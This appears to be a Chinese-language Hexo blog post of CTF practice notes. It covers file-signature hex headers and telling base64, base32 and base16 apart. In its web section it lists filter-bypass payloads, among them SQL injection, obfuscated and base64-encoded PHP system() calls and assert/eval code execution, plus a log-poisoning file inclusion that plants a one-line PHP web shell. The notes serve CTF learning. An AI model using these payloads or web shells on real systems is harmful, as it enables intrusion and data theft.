<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="刷题笔记文件头格式 123456789101112131415161718192021222324252627282930JPEG (jpg)，                        　　文件头：FFD8FF　　　　　　　　　　　　　　　　　　　　　　　                                        文件尾：FF D9　　　　　　　　　　　　　　　PNG (">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="https://css0k.github.io/2022/01/10/%E5%88%B7%E9%A2%98%E7%AC%94%E8%AE%B0/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="刷题笔记文件头格式 123456789101112131415161718192021222324252627282930JPEG (jpg)，                        　　文件头：FFD8FF　　　　　　　　　　　　　　　　　　　　　　　                                        文件尾：FF D9　　　　　　　　　　　　　　　PNG (">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200602074159877.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L21hc3Rlcmd1Mg==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200602074337747.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L21hc3Rlcmd1Mg==,size_16,color_FFFFFF,t_70">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20200602074410371.png">
<meta property="article:published_time" content="2022-01-10T13:21:39.874Z">
<meta property="article:modified_time" content="2022-01-09T13:06:37.973Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img-blog.csdnimg.cn/20200602074159877.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L21hc3Rlcmd1Mg==,size_16,color_FFFFFF,t_70">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.4.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://css0k.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-刷题笔记" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2022/01/10/%E5%88%B7%E9%A2%98%E7%AC%94%E8%AE%B0/" class="article-date">
  <time datetime="2022-01-10T13:21:39.874Z" itemprop="datePublished">2022-01-10</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="article-entry" itemprop="articleBody">
      
        <h4 id="刷题笔记"><a href="#刷题笔记" class="headerlink" title="刷题笔记"></a>刷题笔记</h4><p>文件头格式</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">JPEG (jpg)，                        　　文件头：FFD8FF　　　　　　　　　　　　　　　　　　　　　　　                                        文件尾：FF D9　　　　　　　　　　　　　　　</span><br><span class="line">PNG (png)，                       　　 文件头：89504E47　　　　　　　　　　　　　　　　　　　　　　                                       文件尾：AE 42 60 82</span><br><span class="line">GIF (gif)，                           文件头：47494638　　　　　　　　　　　　　　　　　　　　　　                                       文件尾：00 3B                              ZIP Archive (zip)，                    文件头：504B0304　　　　　　　　　　　　　　　　　　　　　　                                        文件尾：50 4B</span><br><span class="line">TIFF (tif)，                           　  文件头：49492A00　　　　　　　　　　　　　　　　　　　　　　    文件尾：</span><br><span class="line">Windows Bitmap (bmp)，      　  文件头：424D　　　　　　　　　　　　　　　　　　　　　　　　 文件尾：</span><br><span class="line">CAD (dwg)，                        　  文件头：41433130　　　　　　　　　　　　　　　　　　　　　　文件尾：</span><br><span class="line">Adobe Photoshop (psd)，          文件头：38425053　　　　　　　　　　　　　　　　　　　　　　文件尾：</span><br><span class="line">Rich Text Format (rtf)，             文件头：7B5C727466　　　　　　　　　　　　　　　　　　　　  文件尾：</span><br><span class="line">XML (xml)，                              文件头：3C3F786D6C　　　　　　　　　　　　　　　　　　　　 文件尾：</span><br><span class="line">HTML (html)，                           文件头：68746D6C3E</span><br><span class="line">Email [thorough only] (eml)，     文件头：44656C69766572792D646174653A</span><br><span class="line">Outlook Express (dbx)，            文件头：CFAD12FEC5FD746F</span><br><span class="line">Outlook (pst)，                         文件头：2142444E</span><br><span class="line">MS Word/Excel (xls.or.doc)，      文件头：D0CF11E0</span><br><span class="line">MS Access (mdb)，                    文件头：5374616E64617264204A</span><br><span class="line">WordPerfect (wpd)，                  文件头：FF575043</span><br><span class="line">Adobe Acrobat (pdf)，               文件头：255044462D312E</span><br><span class="line">Quicken (qdf)，                         文件头：AC9EBD8F</span><br><span class="line">Windows Password (pwl)，         文件头：E3828596</span><br><span class="line"></span><br><span class="line">RAR Archive (rar)，                    文件头：52617221</span><br><span class="line">Wave (wav)，                            文件头：57415645</span><br><span class="line">AVI (avi)，                                 文件头：41564920</span><br><span class="line">Real Audio (ram)，                     文件头：2E7261FD</span><br><span class="line">Real Media (rm)，                       文件头：2E524D46</span><br><span class="line">MPEG (mpg)，                           文件头：000001BA</span><br><span class="line">MPEG (mpg)，                           文件头：000001B3</span><br><span class="line">Quicktime (mov)，                     文件头：6D6F6F76</span><br><span class="line">Windows Media (asf)，               文件头：3026B2758E66CF11</span><br><span class="line">MIDI (mid)，                              文件头：4D546864</span><br></pre></td></tr></table></figure>

<h4 id="判断base64-32-16密码"><a href="#判断base64-32-16密码" class="headerlink" title="判断base64 32 16密码"></a>判断base64 32 16密码</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">总结Base64密文有如下特点：</span><br><span class="line"></span><br><span class="line">字符串只可能包含A-Z，a-z，0-9，+，/，=字符 </span><br><span class="line">字符串长度是4的倍数 </span><br><span class="line">=只会出现在字符串最后，可能没有或者一个等号或者两个等号</span><br></pre></td></tr></table></figure>

<p>base64索引表</p>
<p><img src="https://img-blog.csdnimg.cn/20200602074159877.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L21hc3Rlcmd1Mg==,size_16,color_FFFFFF,t_70" alt="base64索引表"></p>
<p>base64和base32都以’=‘作为空白补足符符号，如果结尾没有’=’有可能是base16。如果出现了+和/，那么一定是base64。</p>
<p>然后看大小写字母，如果有大写有小写就一定是base64。</p>
<p>如果全是大写的情况就看具体字母有没有F之后的字母出现，因为base16就是16进制，字母部分只到F。</p>
<p><img src="https://img-blog.csdnimg.cn/20200602074337747.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L21hc3Rlcmd1Mg==,size_16,color_FFFFFF,t_70" alt="base32索引表"></p>
<p>当然这个base32的数字部分只有2-7，不过数字一般不好判断，所以这里不推荐用数字进行判断<br><img src="https://img-blog.csdnimg.cn/20200602074410371.png" alt="base16索引表"></p>
<p>16进制：用16作为基数的计数系统。用数字0-9和字母a-f（或其大写A-F）表示0到15。</p>
<p>8进制，用八个阿拉伯数字：0、1、2、3、4、5、6、7</p>
<h4 id="web绕过"><a href="#web绕过" class="headerlink" title="web绕过"></a>web绕过</h4><h5 id="id-1000数字绕过方式"><a href="#id-1000数字绕过方式" class="headerlink" title="id=1000数字绕过方式"></a>id=1000数字绕过方式</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">?id=&#x27;1000&#x27;          #字符串绕过</span><br><span class="line">?id=0b1111101000    #二进制绕过</span><br><span class="line">?id=0x38e           #十六进制绕过</span><br><span class="line">?id=~~1000          #两次取反</span><br><span class="line">?id=1000 or 1=1--+  #sql注入</span><br><span class="line">?id=100 or id=1000  #逻辑绕过</span><br><span class="line">?id=100 || id=1000</span><br><span class="line">?id=500%2b500   # +号的转义符是%2B</span><br><span class="line">?id=900--100</span><br><span class="line">?id=100*10</span><br><span class="line">?id=100/0.1</span><br><span class="line">?id=--1000   #取两次相反数</span><br><span class="line">?id=200^800  #异或</span><br></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th>进制</th>
<th>英文</th>
<th>范围</th>
<th>前缀</th>
<th>后缀</th>
</tr>
</thead>
<tbody><tr>
<td>二进制</td>
<td>Binary</td>
<td>0-1</td>
<td>0B</td>
<td>B</td>
</tr>
<tr>
<td>八进制</td>
<td>Octal</td>
<td>0-7</td>
<td>0O</td>
<td>O</td>
</tr>
<tr>
<td>十进制</td>
<td>Decimal</td>
<td>0-9</td>
<td>无</td>
<td>D</td>
</tr>
<tr>
<td>十六进制</td>
<td>Hexadecimal</td>
<td>0-9,A-F</td>
<td>0x</td>
<td>H</td>
</tr>
</tbody></table>
<h5 id="命令与文件绕过（以不熟悉的文件包含为例嘿嘿）"><a href="#命令与文件绕过（以不熟悉的文件包含为例嘿嘿）" class="headerlink" title="命令与文件绕过（以不熟悉的文件包含为例嘿嘿）"></a>命令与文件绕过（以不熟悉的文件包含为例嘿嘿）</h5><p><strong>system函数</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">// 输出 shell 命令 &quot;ls&quot; 的返回结果</span><br><span class="line">// 并且将输出的最后一样内容返回到 $last_line。</span><br><span class="line">// 将命令的返回值保存到 $retval。</span><br><span class="line">$last_line = system(&#x27;ls&#x27;, $retval);</span><br></pre></td></tr></table></figure>

<p>题干：运用正则定义</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">if(preg_match(&quot;/system|exec|highlight/i&quot;,$c))&#123;</span><br><span class="line">                eval($c); &#125;</span><br></pre></td></tr></table></figure>

<p>wp语句      <code>?c=highlight_file(&#39;config.php&#39;);</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if(preg_match(&quot;/system|exec|highlight/i&quot;,$c))&#123;</span><br><span class="line">                eval($c);</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<h6 id="拼接：c-a-39-sys-39-b-39-tem-39-d-a-b-d-39-cat-config-php-39"><a href="#拼接：c-a-39-sys-39-b-39-tem-39-d-a-b-d-39-cat-config-php-39" class="headerlink" title="拼接：c=$a=&#39;sys&#39;;$b=&#39;tem&#39;;$d=$a.$b;$d(&#39;cat config.php&#39;);"></a>拼接：<code>c=$a=&#39;sys&#39;;$b=&#39;tem&#39;;$d=$a.$b;$d(&#39;cat config.php&#39;);</code></h6><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if(!preg_match(&quot;/system|exec|highlight|cat/i&quot;,$c))&#123;</span><br><span class="line">                eval($c);</span><br><span class="line">        &#125;</span><br></pre></td></tr></table></figure>

<h4 id="替代"><a href="#替代" class="headerlink" title="替代"></a>替代</h4><p>cat的禁用，这个好说，linux有很多类似于cat的方法 tac、more、less、head、tail、nl、sed、sort、uniq.</p>
<h4 id="单引号或者双引号或者反斜杠绕过"><a href="#单引号或者双引号或者反斜杠绕过" class="headerlink" title="单引号或者双引号或者反斜杠绕过"></a>单引号或者双引号或者反斜杠绕过</h4><p><code>ca’&#39;t config.php ca&quot;t config.php ca\t config.php</code></p>
<h4 id="编码绕过"><a href="#编码绕过" class="headerlink" title="编码绕过"></a>编码绕过</h4><p><code>c=$a = base64_decode(&#39;c3lzdGVt&#39;);$b=base64_decode(&#39;Y2F0IGNvbmZpZy5waHA=&#39;);$a($b);</code></p>
<p>​                                  system                                                    cat config.php                    </p>
<ul>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.exec.php">exec()</a> - 执行一个外部程序</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.passthru.php">passthru()</a> - 执行外部程序并且显示原始输出</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.popen.php">popen()</a> - 打开进程文件指针</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.escapeshellcmd.php">escapeshellcmd()</a> - shell 元字符转义</li>
<li><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/function.pcntl-exec.php">pcntl_exec()</a> - 在当前进程空间执行指定程序</li>
</ul>
<p><strong>在linux中反引号的作用就是将反引号内的Linux命令先执行，然后将执行结果赋予变量</strong></p>
<p><code>c=passthru(&quot;ca&#39;&#39;t ls&quot;);  </code>        比如 cat ls相当于将 ls出来的结果cat `</p>
<p><strong>assert() 会检查指定的 assertion 并在结果为 FALSE 时采取适当的响应。如果 assertion 是字符串，它将会被 assert() 当做 PHP 代码来执行。</strong></p>
<p><code>c=assert(base64_decode(%27c3lzdGVtKCdjYXQgY29uZmlnLnBocCcp%27))?&gt;</code></p>
<h4 id="创建post绕过"><a href="#创建post绕过" class="headerlink" title="创建post绕过"></a>创建post绕过</h4><p>源码执行  eval($c)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?c=<span class="keyword">echo</span> `<span class="variable">$_POST</span>[<span class="number">1</span>]`<span class="meta">?&gt;</span></span><br><span class="line">post传入 <span class="number">1</span>=cat config.php</span><br></pre></td></tr></table></figure>

<p>eval() 函数把字符串按照 PHP 代码来计算。</p>
<p>该字符串必须是合法的 PHP 代码，且必须以分号结尾。</p>
<h4 id="文件包含"><a href="#文件包含" class="headerlink" title="文件包含"></a>文件包含</h4><p>常用文件路径：/var/log/nginx(apache2)/access.log</p>
<p>然后用bp抓包  将一句话木马插入请求报文 （一般插入user-agent中）</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;a&#x27;</span>]); <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>再用post data请求发送指令验证是否连接成功</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a=phpinfo();</span><br></pre></td></tr></table></figure>

<p>用蚁剑连接数据库，获取flag：36d</p>

      
    </div>
    <footer class="article-footer">
      <a data-url="https://css0k.github.io/2022/01/10/%E5%88%B7%E9%A2%98%E7%AC%94%E8%AE%B0/" data-id="cky8pru9v0000a4wb3p5q2y21" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2022/01/08/V/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">^V</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    

  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/01/">January 2022</a></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/01/10/%E5%88%B7%E9%A2%98%E7%AC%94%E8%AE%B0/">(no title)</a>
          </li>
        
          <li>
            <a href="/2022/01/08/V/">^V</a>
          </li>
        
          <li>
            <a href="/2022/01/07/html1-7/">html1.7</a>
          </li>
        
          <li>
            <a href="/2022/01/07/python-1/">python</a>
          </li>
        
          <li>
            <a href="/2022/01/07/note1-7/">note1.7</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2022 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
</body>
</html>